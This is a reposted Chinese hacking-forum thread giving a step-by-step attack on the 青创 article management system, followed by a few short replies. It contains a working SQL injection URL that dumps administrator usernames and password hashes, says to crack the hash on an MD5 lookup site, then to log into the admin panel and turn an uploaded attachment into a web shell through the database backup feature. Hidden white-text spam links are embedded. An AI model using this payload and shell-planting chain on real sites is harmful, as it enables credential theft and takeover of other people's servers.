【转载】(注射)青创文章管理系统(漏洞)
admin_userview.asp?unid=1%20and%201=2%20union%20select%201,2,3,username,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20article_admin[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]这个漏洞已经不算什么秘密了 网上也有很多教程
利用方法呢是 [url=http://]url:http://文章系统的网址.com/admin_userview.asp?unid=1%20and%201=2%20union%20select%201,2,3,username,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20article_admin
看出来了个资料表 吧E-Mail:地址框里面的内容记下来 那个是管理员ID 下边的7a57a5a743894a0e乱码就是密码 我们打开[url=http://www.cmd5.com]http://www.cmd5.com里面转换成密码文件就可以了 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
然后在打开后台[url=http://]url:http://文章系统的网址.com/admin_index.asp
输入管理员ID密码就可以了
然后是添加文章 当然是添加附件了呵呵 然后备份数据库 记录数据库地址 就是我们的SHELL了呵呵 牛。。。
要是做个教程就好了!
顶。。。 我去找一下相关方面的说明。谢谢了 没看懂。。。
页:
[1]